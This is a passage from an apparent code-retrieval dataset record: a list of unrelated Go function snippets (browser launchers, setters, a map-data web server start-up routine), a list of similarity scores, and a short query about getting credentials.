WebBrowserCookieSettingsPBrowserDefault() *WebBrowserCookieSettings {\n\tv := WebBrowserCookieSettingsVBrowserDefault\n\treturn &v\n}", "func (s *UpdateBrowserSettingsInput) SetBrowserPolicy(v string) *UpdateBrowserSettingsInput {\n\ts.BrowserPolicy = &v\n\treturn s\n}", "func (*Browser) Open(url string) error {\n\treturn browser.OpenURL(url)\n}", "func (nm *NodeMonitor) setProcess(proc *os.Process) {\n\tnm.mutex.Lock()\n\tnm.process = proc\n\tnm.mutex.Unlock()\n}", "func (n *mockAgent) setAgentURL() error {\n\treturn nil\n}", "func BrowserCommand(\n\tlog Logger,\n\tcr CommandRunner,\n\tm manifest.Manifest,\n\truntimeOS string,\n) func(*cli.Cmd) {\n\treturn func(cmd *cli.Cmd) {\n\t\tproject := cmd.StringArg(\"PROJECT\", \"\", \"name or alias of project to open in browser\")\n\n\t\tcmd.Action = func() {\n\t\t\tp, err := m.FindProject(*project)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"%s\", err)\n\t\t\t}\n\n\t\t\tu, err := p.BrowserURL()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"failed to build browser URL: %s\", err)\n\t\t\t}\n\n\t\t\tbin := \"xdg-open\"\n\t\t\tif runtimeOS == \"darwin\" {\n\t\t\t\tbin = \"open\"\n\t\t\t}\n\n\t\t\tc := exec.Command(bin, u)\n\t\t\terr = cr.Run(c)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"failed to open project in browser: %s\", err)\n\t\t\t}\n\t\t}\n\t}\n}", "func (m *PrinterLocation) SetSite(value *string)() {\n err := m.GetBackingStore().Set(\"site\", value)\n if err != nil {\n panic(err)\n }\n}", "func (c *IRacing) SetHTTP(client *http.Client) {\n\tc.http = client\n}", "func (d *Dnsfilter) SetSafeBrowsingServer(host string) {\n\tif len(host) == 0 {\n\t\td.safeBrowsingServer = defaultSafebrowsingServer\n\t} else {\n\t\td.safeBrowsingServer = host\n\t}\n}", "func SetProcess(proc string) {\n process = proc\n}", "func SetGenesis() {\n\tglobalData.Lock()\n\tsetGenesis()\n\tglobalData.Unlock()\n}", "func NewBrowserClient(url string) (*browserClient, error) {\n\tbc, err := newBaseClient(url)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &browserClient{bc}, nil\n}", "func (wc *WebClient) WindowSetColour(colour int) {\n}", "func (t *Element) RequestFullscreenByBrowser() {\n\telem := t.Value_JS\n\tif !elem.Get(\"requestFullscreen\").IsUndefined() {\n\t\telem.Call(\"requestFullscreen\", \"\")\n\t} else if !elem.Get(\"mozRequestFullScreen\").IsUndefined() { /* Firefox */\n\t\telem.Call(\"mozRequestFullScreen\", \"\")\n\t} else if !elem.Get(\"webkitRequestFullscreen\").IsUndefined() { /* Chrome, Safari and Opera */\n\t\telem.Call(\"webkitRequestFullscreen\", \"\")\n\t} else if !elem.Get(\"msRequestFullscreen\").IsUndefined() { /* IE/Edge */\n\t\telem.Call(\"msRequestFullscreen\", \"\")\n\t}\n}", "func (gbc *GomeboyColor) setHardwareMode(isColor bool) {\n\tif isColor {\n\t\tgbc.cpu.R.A = 0x11\n\t\tgbc.gpu.RunningColorGBHardware = gbc.mmu.IsCartridgeColor()\n\t\tgbc.mmu.RunningColorGBHardware = true\n\t} else {\n\t\tgbc.cpu.R.A = 0x01\n\t\tgbc.gpu.RunningColorGBHardware = false\n\t\tgbc.mmu.RunningColorGBHardware = false\n\t}\n}", "func (m *PrintConnector) SetOperatingSystem(value *string)() {\n err := m.GetBackingStore().Set(\"operatingSystem\", value)\n if err != nil {\n panic(err)\n }\n}", "func (s *CreateBrowserSettingsInput) SetBrowserPolicy(v string) *CreateBrowserSettingsInput {\n\ts.BrowserPolicy = &v\n\treturn s\n}", "func SetDB(db *config.DatabaseCfg) {\n\tdbc = db\n}", "func (u *User) SetBot(value bool) {\n\tif value {\n\t\tu.Flags.Set(14)\n\t\tu.Bot = true\n\t} else {\n\t\tu.Flags.Unset(14)\n\t\tu.Bot = false\n\t}\n}", "func (cfg *Config) SetDefaultConfig() {\n\tcfg.Title = \"APK Browser\"\n\tcfg.HTTP.SetDefaultConfig()\n}", "func (p *Protocol) Set(value string) error {\n\t*p = Protocol(strings.ToLower(value))\n\treturn nil\n}", "func (cl *APIClient) SetUserAgent(str string, rv string) *APIClient {\n\tcl.ua = str + \" (\" + runtime.GOOS + \"; \" + runtime.GOARCH + \"; rv:\" + rv + \") go-sdk/\" + cl.GetVersion() + \" go/\" + runtime.Version()\n\treturn cl\n}", "func runBrowser(exePath string, switches []string, env map[string]string, logFilePath string) (*exec.Cmd, *os.File, error) {\n\tvar logFile *os.File\n\n\tcmd := exec.Command(exePath, switches...)\n\tcmd.Env = os.Environ()\n\tif len(env) > 0 {\n\t\tfor k, v := range env {\n\t\t\tcmd.Env = append(cmd.Env, []string{k + \"=\" + v}...)\n\t\t}\n\t}\n\tstdout, err := cmd.StdoutPipe()\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tstderr, err := cmd.StderrPipe()\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tif err := cmd.Start(); err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tif logFilePath != \"\" {\n\t\tflags := os.O_WRONLY | os.O_CREATE | os.O_TRUNC\n\t\tlogFile, err = os.OpenFile(logFilePath, flags, 0640)\n\t\tif err != nil {\n\t\t\treturn nil, nil, err\n\t\t}\n\t\tgo io.Copy(logFile, stdout)\n\t\tgo io.Copy(logFile, stderr)\n\t} else {\n\t\tgo io.Copy(os.Stdout, stdout)\n\t\tgo io.Copy(os.Stderr, stderr)\n\t}\n\treturn cmd, logFile, nil\n}", "func (m *BrowserSiteList) SetDisplayName(value *string)() {\n err := m.GetBackingStore().Set(\"displayName\", value)\n if err != nil {\n panic(err)\n }\n}", "func (wc *WebClient) WindowSetTitle(title string) {}", "func (s *BrowserSettings) SetBrowserPolicy(v string) *BrowserSettings {\n\ts.BrowserPolicy = &v\n\treturn s\n}", "func (m *MockSession) SetIsFrontend(arg0 bool) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"SetIsFrontend\", arg0)\n}", "func SetFlavor(f string) {\n\tagentFlavor = f\n\n\tif agentFlavor == flavor.IotAgent {\n\t\tC.m.Lock()\n\t\tC.IotHost = true\n\t\tC.m.Unlock()\n\t}\n}", "func SetOSNotifier(n Notifier) {\n\tmu.Lock()\n\tdefer mu.Unlock()\n\tif globalNotifier != nil {\n\t\tglobalNotifier.Shutdown()\n\t}\n\tglobalNotifier = n\n}", "func (m *BrowserSiteList) SetSites(value []BrowserSiteable)() {\n err := m.GetBackingStore().Set(\"sites\", value)\n if err != nil {\n panic(err)\n }\n}", "func (c *ChromeNetwork) SetUserAgentOverride(userAgent string, ) (*ChromeResponse, error) {\n\tparamRequest := make(map[string]interface{}, 1)\n\tparamRequest[\"userAgent\"] = userAgent\n\treturn sendDefaultRequest(c.target.sendCh, &ParamRequest{Id: c.target.getId(), Method: \"Network.setUserAgentOverride\", Params: paramRequest})\n}", "func (m *Setup) SetCapability(network string, capName string, args interface{}) error {\n\tfor i := range m.networks {\n\t\tif m.networks[i] == network {\n\t\t\thasCap := false\n\t\t\tfor _, plugin := range m.networkConfList[i].Plugins {\n\t\t\t\tif plugin.Network.Capabilities[capName] {\n\t\t\t\t\thasCap = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif !hasCap {\n\t\t\t\treturn fmt.Errorf(\"%s network doesn't have %s capability\", network, capName)\n\t\t\t}\n\n\t\t\tswitch args := args.(type) {\n\t\t\tcase PortMapEntry:\n\t\t\t\tif m.runtimeConf[i].CapabilityArgs[capName] == nil {\n\t\t\t\t\tm.runtimeConf[i].CapabilityArgs[capName] = make([]PortMapEntry, 0)\n\t\t\t\t}\n\t\t\t\tm.runtimeConf[i].CapabilityArgs[capName] = append(\n\t\t\t\t\tm.runtimeConf[i].CapabilityArgs[capName].([]PortMapEntry),\n\t\t\t\t\targs,\n\t\t\t\t)\n\t\t\tcase []allocator.Range:\n\t\t\t\tif m.runtimeConf[i].CapabilityArgs[capName] == nil {\n\t\t\t\t\tm.runtimeConf[i].CapabilityArgs[capName] = []allocator.RangeSet{args}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func SetComputerName(lpComputerName string) bool {\n\tlpComputerNameStr := unicode16FromString(lpComputerName)\n\tret1 := syscall3(setComputerName, 1,\n\t\tuintptr(unsafe.Pointer(&lpComputerNameStr[0])),\n\t\t0,\n\t\t0)\n\treturn ret1 != 0\n}", "func (m *BrowserSiteList) SetDescription(value *string)() {\n err := m.GetBackingStore().Set(\"description\", value)\n if err != nil {\n panic(err)\n }\n}", "func SetURL(url string) func(*MGO) error {\n\treturn func(m *MGO) error {\n\t\tm.url = url\n\t\treturn nil\n\t}\n}", "func WebBrowserCookieSettingsPAllowAlways() *WebBrowserCookieSettings {\n\tv := WebBrowserCookieSettingsVAllowAlways\n\treturn &v\n}", "func RegistrySet() {\n\tif *Registry == \"\" {\n\t\tApp.Errorf(\"required flag --%s not provided, try --help\", RegistryName)\n\t\tos.Exit(1)\n\t}\n}", "func LocateBrowser(preferredBrowser string) BrowserProtocol {\n\tp := BrowserProtocol{}\n\n\tswitch preferredBrowser {\n\tcase \"chrome\":\n\t\tp = LocateChrome()\n\tcase \"edge\":\n\t\tp = LocateEdge()\n\tcase \"brave\":\n\t\tp = LocateBrave()\n\t// case \"firefox\":\n\t// \tp = LocateFirefox()\n\tdefault:\n\t\tswitch runtime.GOOS {\n\t\tcase \"darwin\":\n\t\tcase \"windows\":\n\t\t\tp = LocateEdge()\n\t\tdefault:\n\t\t\t// p = LocateFirefox()\n\t\t\t// ! In Firefox, remote debugging port needs to be enabled explicitly.\n\t\t}\n\t}\n\n\tif p.Path == \"\" {\n\t\tp = LocateChrome()\n\t}\n\n\tif p.Path == \"\" {\n\t\tp = LocateBrave()\n\t}\n\n\tif p.Path == \"\" {\n\t\tp = LocateEdge()\n\t}\n\n\t// if p.Path == \"\" {\n\t// \tp = LocateFirefox()\n\t// }\n\n\treturn p\n}", "func (p *Page) MustSetWindow(left, top, width, height int) *Page {\n\tp.e(p.SetWindow(&proto.BrowserBounds{\n\t\tLeft: gson.Int(left),\n\t\tTop: gson.Int(top),\n\t\tWidth: gson.Int(width),\n\t\tHeight: gson.Int(height),\n\t\tWindowState: proto.BrowserWindowStateNormal,\n\t}))\n\treturn p\n}", "func (m *BrowserSiteList) SetRevision(value *string)() {\n err := m.GetBackingStore().Set(\"revision\", value)\n if err != nil {\n panic(err)\n }\n}", "func SetBackend(backend SupportedBackend, b Backend) {\n\tswitch backend {\n\tcase YFinBackend:\n\t\tbackends.YFin = b\n\tcase BATSBackend:\n\t\tbackends.Bats = b\n\t}\n}", "func (mu *ModelUpdate) SetWeb(s string) *ModelUpdate {\n\tmu.mutation.SetWeb(s)\n\treturn mu\n}", "func (m *BookingBusiness) SetWebSiteUrl(value *string)() {\n err := m.GetBackingStore().Set(\"webSiteUrl\", value)\n if err != nil {\n panic(err)\n }\n}", "func (g *GRPC) SetHTTPServer(serv *http.Server) {\n\tg.httpServer = serv\n}", "func SetDefaultWebServer(ws WebServer) error {\n\tif DefaultWebServer != nil {\n\t\treturn fmt.Errorf(\"default web server has been already configured\")\n\t}\n\tDefaultWebServer = ws\n\treturn nil\n}", "func (s *server) setBackend(b backends.Backend) {\n\ts.backendStore.Store(b)\n}", "func Start(ctx context.Context) error {\n\n\tfs := flagset.NewFlagSet(\"browser\")\n\n\tserver_uri := fs.String(\"server-uri\", \"http://localhost:8080\", \"A valid aaronland/go-http-server URI.\")\n\n\tstatic_prefix := fs.String(\"static-prefix\", \"\", \"Prepend this prefix to URLs for static assets.\")\n\n\tpath_templates := fs.String(\"templates\", \"\", \"An optional string for local templates. This is anything that can be read by the 'templates.ParseGlob' method.\")\n\n\tdata_source := fs.String(\"reader-source\", \"whosonfirst-data://\", \"A valid go-reader Reader URI string.\")\n\tcache_source := fs.String(\"cache-source\", \"gocache://\", \"A valid go-cache Cache URI string.\")\n\n\tnextzen_api_key := fs.String(\"nextzen-api-key\", \"\", \"A valid Nextzen API key (https://developers.nextzen.org/).\")\n\tnextzen_style_url := fs.String(\"nextzen-style-url\", \"/tangram/refill-style.zip\", \"A valid Tangram scene file URL.\")\n\tnextzen_tile_url := fs.String(\"nextzen-tile-url\", tangramjs.NEXTZEN_MVT_ENDPOINT, \"A valid Nextzen MVT tile URL.\")\n\n\tproxy_tiles := fs.Bool(\"proxy-tiles\", false, \"Proxy (and cache) Nextzen tiles.\")\n\tproxy_tiles_url := fs.String(\"proxy-tiles-url\", \"/tiles/\", \"The URL (a relative path) for proxied tiles.\")\n\tproxy_tiles_cache := fs.String(\"proxy-tiles-cache\", \"gocache://\", \"A valid tile proxy DSN string.\")\n\tproxy_tiles_timeout := fs.Int(\"proxy-tiles-timeout\", 30, \"The maximum number of seconds to allow for fetching a tile from the proxy.\")\n\n\tenable_all := fs.Bool(\"enable-all\", false, \"Enable all the available output handlers.\")\n\tenable_graphics := fs.Bool(\"enable-graphics\", false, \"Enable the 'png' and 'svg' output handlers.\")\n\tenable_data := fs.Bool(\"enable-data\", false, \"Enable the 'geojson' and 'spr' and 'select' output handlers.\")\n\n\tenable_png := fs.Bool(\"enable-png\", false, \"Enable the 'png' output handler.\")\n\tenable_svg := fs.Bool(\"enable-svg\", false, \"Enable the 'svg' output handler.\")\n\n\tenable_geojson := fs.Bool(\"enable-geojson\", true, \"Enable the 'geojson' output handler.\")\n\tenable_geojsonld := fs.Bool(\"enable-geojson-ld\", true, \"Enable the 'geojson-ld' output handler.\")\n\tenable_spr := fs.Bool(\"enable-spr\", true, \"Enable the 'spr' (or \\\"standard places response\\\") output handler.\")\n\tenable_select := fs.Bool(\"enable-select\", false, \"Enable the 'select' output handler.\")\n\n\tselect_pattern := fs.String(\"select-pattern\", \"properties(?:.[a-zA-Z0-9-_]+){1,}\", \"A valid regular expression for sanitizing select parameters.\")\n\n\tenable_html := fs.Bool(\"enable-html\", true, \"Enable the 'html' (or human-friendly) output handlers.\")\n\n\tenable_search_api := fs.Bool(\"enable-search-api\", true, \"Enable the (API) search handlers.\")\n\tenable_search_api_geojson := fs.Bool(\"enable-search-api-geojson\", false, \"Enable the (API) search handlers to return results as GeoJSON.\")\n\n\tenable_search_html := fs.Bool(\"enable-search-html\", true, \"Enable the (human-friendly) search handlers.\")\n\n\tenable_search := fs.Bool(\"enable-search\", false, \"Enable both the API and human-friendly search handlers.\")\n\n\tsearch_database_uri := fs.String(\"search-database-uri\", \"\", \"A valid whosonfirst/go-whosonfist-search/fulltext URI.\")\n\n\tpath_png := fs.String(\"path-png\", \"/png/\", \"The path that PNG requests should be served from.\")\n\tpath_svg := fs.String(\"path-svg\", \"/svg/\", \"The path that SVG requests should be served from.\")\n\tpath_geojson := fs.String(\"path-geojson\", \"/geojson/\", \"The path that GeoJSON requests should be served from.\")\n\tpath_geojsonld := fs.String(\"path-geojson-ld\", \"/geojson-ld/\", \"The path that GeoJSON-LD requests should be served from.\")\n\tpath_spr := fs.String(\"path-spr\", \"/spr/\", \"The path that SPR requests should be served from.\")\n\tpath_select := fs.String(\"path-select\", \"/select/\", \"The path that 'select' requests should be served from.\")\n\n\tpath_search_api := fs.String(\"path-search-api\", \"/search/spr/\", \"The path that API 'search' requests should be served from.\")\n\tpath_search_html := fs.String(\"path-search-html\", \"/search/\", \"The path that API 'search' requests should be served from.\")\n\n\tpath_id := fs.String(\"path-id\", \"/id/\", \"The that Who's On First documents should be served from.\")\n\n\tflagset.Parse(fs)\n\n\terr := flagset.SetFlagsFromEnvVarsWithFeedback(fs, \"BROWSER\", true)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif *enable_all {\n\t\t*enable_graphics = true\n\t\t*enable_data = true\n\t\t*enable_html = true\n\t\t*enable_search = true\n\t}\n\n\tif *enable_search {\n\t\t*enable_search_api = true\n\t\t*enable_search_api_geojson = true\n\t\t*enable_search_html = true\n\t}\n\n\tif *enable_graphics {\n\t\t*enable_png = true\n\t\t*enable_svg = true\n\t}\n\n\tif *enable_data {\n\t\t*enable_geojson = true\n\t\t*enable_geojsonld = true\n\t\t*enable_spr = true\n\t\t*enable_select = true\n\t}\n\n\tif *enable_search_html {\n\t\t*enable_html = true\n\t}\n\n\tif *enable_html {\n\t\t*enable_geojson = true\n\t\t*enable_png = true\n\t}\n\n\tif *cache_source == \"tmp://\" {\n\n\t\tnow := time.Now()\n\t\tprefix := fmt.Sprintf(\"go-whosonfirst-browser-%d\", now.Unix())\n\n\t\ttempdir, err := ioutil.TempDir(\"\", prefix)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tlog.Println(tempdir)\n\t\tdefer os.RemoveAll(tempdir)\n\n\t\t*cache_source = fmt.Sprintf(\"fs://%s\", tempdir)\n\t}\n\n\tcr_q := url.Values{}\n\tcr_q.Set(\"reader\", *data_source)\n\tcr_q.Set(\"cache\", *cache_source)\n\n\tcr_uri := url.URL{}\n\tcr_uri.Scheme = \"cachereader\"\n\tcr_uri.RawQuery = cr_q.Encode()\n\n\tcr, err := reader.NewReader(ctx, cr_uri.String())\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// start of sudo put me in a package\n\n\tt := template.New(\"whosonfirst-browser\").Funcs(template.FuncMap{\n\t\t\"Add\": func(i int, offset int) int {\n\t\t\treturn i + offset\n\t\t},\n\t})\n\n\tif *path_templates != \"\" {\n\n\t\tt, err = t.ParseGlob(*path_templates)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t} else {\n\n\t\tfor _, name := range templates.AssetNames() {\n\n\t\t\tbody, err := templates.Asset(name)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tt, err = t.Parse(string(body))\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// end of sudo put me in a package\n\n\tif *static_prefix != \"\" {\n\n\t\t*static_prefix = strings.TrimRight(*static_prefix, \"/\")\n\n\t\tif !strings.HasPrefix(*static_prefix, \"/\") {\n\t\t\treturn errors.New(\"Invalid -static-prefix value\")\n\t\t}\n\t}\n\n\tmux := gohttp.NewServeMux()\n\n\tping_handler, err := http.PingHandler()\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tmux.Handle(\"/ping\", ping_handler)\n\n\tif *enable_png {\n\n\t\tpng_opts, err := http.NewDefaultRasterOptions()\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tpng_handler, err := http.RasterHandler(cr, png_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_png, png_handler)\n\t}\n\n\tif *enable_svg {\n\n\t\tsvg_opts, err := http.NewDefaultSVGOptions()\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tsvg_handler, err := http.SVGHandler(cr, svg_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_svg, svg_handler)\n\t}\n\n\tif *enable_spr {\n\n\t\tspr_handler, err := http.SPRHandler(cr)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_spr, spr_handler)\n\t}\n\n\tif *enable_geojson {\n\n\t\tgeojson_handler, err := http.GeoJSONHandler(cr)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_geojson, geojson_handler)\n\t}\n\n\tif *enable_geojsonld {\n\n\t\tgeojsonld_handler, err := http.GeoJSONLDHandler(cr)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_geojsonld, geojsonld_handler)\n\t}\n\n\tif *enable_select {\n\n\t\tif *select_pattern == \"\" {\n\t\t\treturn errors.New(\"Missing -select-pattern parameter.\")\n\t\t}\n\n\t\tpat, err := regexp.Compile(*select_pattern)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tselect_opts := &http.SelectHandlerOptions{\n\t\t\tPattern: pat,\n\t\t}\n\n\t\tselect_handler, err := http.SelectHandler(cr, select_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_select, select_handler)\n\t}\n\n\tif *enable_search_api {\n\n\t\tsearch_db, err := fulltext.NewFullTextDatabase(ctx, *search_database_uri)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tsearch_opts := http.SearchAPIHandlerOptions{\n\t\t\tDatabase: search_db,\n\t\t}\n\n\t\tif *enable_search_api_geojson {\n\n\t\t\tsearch_opts.EnableGeoJSON = true\n\n\t\t\tgeojson_reader, err := reader.NewReader(ctx, *data_source)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tsearch_opts.GeoJSONReader = geojson_reader\n\n\t\t\t/*\n\t\t\t\tif resolver_uri != \"\" {\n\n\t\t\t\tresolver_func, err := geojson.NewSPRPathResolverFunc(ctx, resolver_uri)\n\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tapi_pip_opts.SPRPathResolver = resolver_func\n\t\t\t*/\n\t\t}\n\n\t\tsearch_handler, err := http.SearchAPIHandler(search_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmux.Handle(*path_search_api, search_handler)\n\t}\n\n\tif *enable_html {\n\n\t\tif *proxy_tiles {\n\n\t\t\ttile_cache, err := cache.NewCache(ctx, *proxy_tiles_cache)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\ttimeout := time.Duration(*proxy_tiles_timeout) * time.Second\n\n\t\t\tproxy_opts := &tzhttp.TilezenProxyHandlerOptions{\n\t\t\t\tCache: tile_cache,\n\t\t\t\tTimeout: timeout,\n\t\t\t}\n\n\t\t\tproxy_handler, err := tzhttp.TilezenProxyHandler(proxy_opts)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// the order here is important - we don't have a general-purpose \"add to\n\t\t\t// mux with prefix\" function here, like we do in the tangram handler so\n\t\t\t// we set the nextzen tile url with *proxy_tiles_url and then update it\n\t\t\t// (*proxy_tiles_url) with a prefix if necessary (20190911/thisisaaronland)\n\n\t\t\t*nextzen_tile_url = fmt.Sprintf(\"%s{z}/{x}/{y}.mvt\", *proxy_tiles_url)\n\n\t\t\tif *static_prefix != \"\" {\n\n\t\t\t\t*proxy_tiles_url = filepath.Join(*static_prefix, *proxy_tiles_url)\n\n\t\t\t\tif !strings.HasSuffix(*proxy_tiles_url, \"/\") {\n\t\t\t\t\t*proxy_tiles_url = fmt.Sprintf(\"%s/\", *proxy_tiles_url)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tmux.Handle(*proxy_tiles_url, proxy_handler)\n\t\t}\n\n\t\tbootstrap_opts := bootstrap.DefaultBootstrapOptions()\n\n\t\ttangramjs_opts := tangramjs.DefaultTangramJSOptions()\n\t\ttangramjs_opts.Nextzen.APIKey = *nextzen_api_key\n\t\ttangramjs_opts.Nextzen.StyleURL = *nextzen_style_url\n\t\ttangramjs_opts.Nextzen.TileURL = *nextzen_tile_url\n\n\t\tendpoints := &http.Endpoints{\n\t\t\tData: *path_geojson,\n\t\t\tPng: *path_png,\n\t\t\tSvg: *path_svg,\n\t\t\tSpr: *path_spr,\n\t\t\tId: *path_id,\n\t\t\tIndex: \"/\",\n\t\t}\n\n\t\tif *enable_search_html {\n\t\t\tendpoints.Search = *path_search_html\n\t\t}\n\n\t\tindex_opts := http.IndexHandlerOptions{\n\t\t\tTemplates: t,\n\t\t\tEndpoints: endpoints,\n\t\t}\n\n\t\tindex_handler, err := http.IndexHandler(index_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tindex_handler = bootstrap.AppendResourcesHandlerWithPrefix(index_handler, bootstrap_opts, *static_prefix)\n\n\t\tmux.Handle(\"/\", index_handler)\n\n\t\tid_opts := http.IDHandlerOptions{\n\t\t\tTemplates: t,\n\t\t\tEndpoints: endpoints,\n\t\t}\n\n\t\tid_handler, err := http.IDHandler(cr, id_opts)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tid_handler = bootstrap.AppendResourcesHandlerWithPrefix(id_handler, bootstrap_opts, *static_prefix)\n\t\tid_handler = tangramjs.AppendResourcesHandlerWithPrefix(id_handler, tangramjs_opts, *static_prefix)\n\n\t\tmux.Handle(*path_id, id_handler)\n\n\t\tif *enable_search_html {\n\n\t\t\tsearch_db, err := fulltext.NewFullTextDatabase(ctx, *search_database_uri)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tsearch_opts := http.SearchHandlerOptions{\n\t\t\t\tTemplates: t,\n\t\t\t\tEndpoints: endpoints,\n\t\t\t\tDatabase: search_db,\n\t\t\t}\n\n\t\t\tsearch_handler, err := http.SearchHandler(search_opts)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tsearch_handler = bootstrap.AppendResourcesHandlerWithPrefix(search_handler, bootstrap_opts, *static_prefix)\n\t\t\tsearch_handler = tangramjs.AppendResourcesHandlerWithPrefix(search_handler, tangramjs_opts, *static_prefix)\n\n\t\t\tmux.Handle(*path_search_html, search_handler)\n\t\t}\n\n\t\terr = bootstrap.AppendAssetHandlersWithPrefix(mux, *static_prefix)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = tangramjs.AppendAssetHandlersWithPrefix(mux, *static_prefix)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = http.AppendStaticAssetHandlersWithPrefix(mux, *static_prefix)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t}\n\n\ts, err := server.NewServer(ctx, *server_uri)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog.Printf(\"Listening on %s\\n\", s.Address())\n\n\treturn s.ListenAndServe(ctx, mux)\n}", "func browsers() []string {\n\tvar cmds []string\n\tif userBrowser := os.Getenv(\"BROWSER\"); userBrowser != \"\" {\n\t\tcmds = append(cmds, userBrowser)\n\t}\n\tswitch runtime.GOOS {\n\tcase \"darwin\":\n\t\tcmds = append(cmds, \"/usr/bin/open\")\n\tcase \"windows\":\n\t\tcmds = append(cmds, \"cmd /c start\")\n\tdefault:\n\t\t// Commands opening browsers are prioritized over xdg-open, so browser()\n\t\t// command can be used on linux to open the .svg file generated by the -web\n\t\t// command (the .svg file includes embedded javascript so is best viewed in\n\t\t// a browser).\n\t\tcmds = append(cmds, []string{\"chrome\", \"google-chrome\", \"chromium\", \"firefox\", \"sensible-browser\"}...)\n\t\tif os.Getenv(\"DISPLAY\") != \"\" {\n\t\t\t// xdg-open is only for use in a desktop environment.\n\t\t\tcmds = append(cmds, \"xdg-open\")\n\t\t}\n\t}\n\treturn cmds\n}", "func (filterdev *NetworkTap) SetPromisc(m int) error {\n\t_, _, err := syscall.Syscall(syscall.SYS_IOCTL, uintptr(filterdev.device.Fd()), syscall.BIOCPROMISC, uintptr(unsafe.Pointer(&m)))\n\tif err != 0 {\n\t\treturn syscall.Errno(err)\n\t}\n\treturn nil\n}", "func SetAPI(token string, url string, ver string) {\n\tSetToken(token)\n\tif url != \"\" {\n\t\tAPI.URL = url\n\t}\n\tif ver != \"\" {\n\t\tAPI.Ver = ver\n\t}\n}", "func SetHTTPClient(client *http.Client) error {\n\tif client == nil {\n\t\treturn errHTTPClientInvalid\n\t}\n\tm.Lock()\n\t_HTTPClient = client\n\tm.Unlock()\n\treturn nil\n}", "func (c *Capabilities) Set(capability string, values ...string) {\n\tif _, ok := c.m[capability]; ok {\n\t\tdelete(c.m, capability)\n\t}\n\n\tc.Add(capability, values...)\n}", "func (f *Fridge) SetOn(turnOn bool) {\n\tlog.Warnf(\"SetOn: %v\", turnOn)\n\ts := f.GetStatusReport().Settings\n\tif s.On != turnOn {\n\t\ts.On = turnOn\n\t\tf.settingsC <- s\n\t}\n}" ]
[ "0.72971094", "0.66990113", "0.5628305", "0.55711406", "0.5487769", "0.53573465", "0.5282512", "0.5175293", "0.51374984", "0.5120229", "0.5111362", "0.5064141", "0.50546795", "0.49590006", "0.4958929", "0.48795363", "0.4874678", "0.4832962", "0.47898892", "0.47596237", "0.47570115", "0.4729475", "0.47120574", "0.47114974", "0.4703784", "0.46995518", "0.46916026", "0.46744516", "0.46723762", "0.4655997", "0.46167868", "0.4606578", "0.45966655", "0.45864534", "0.45732036", "0.45468912", "0.4541628", "0.45335716", "0.45240378", "0.45193875", "0.45104378", "0.4500928", "0.44997832", "0.44909668", "0.44605264", "0.4446379", "0.4444392", "0.44440767", "0.4443639", "0.44384602", "0.4438325", "0.44349933", "0.44225174", "0.44123697", "0.44066885", "0.44051096", "0.44017506", "0.44011462", "0.44006315", "0.43907622", "0.4390053", "0.43889502", "0.43465477", "0.43457073", "0.43401295", "0.43277475", "0.43243542", "0.432361", "0.43196765", "0.4319627", "0.43165633", "0.4315735", "0.43143612", "0.43073156", "0.43006477", "0.42933032", "0.42890325", "0.42783046", "0.42732254", "0.4263733", "0.42598003", "0.424707", "0.42416254", "0.42332438", "0.42321813", "0.42208725", "0.42166138", "0.42163426", "0.42153746", "0.42106125", "0.42073408", "0.420259", "0.41992882", "0.4198757", "0.4197218", "0.41938275", "0.41918752", "0.4180207", "0.4163537", "0.416253" ]
0.7992024
0
GetCredentials get current credentials.
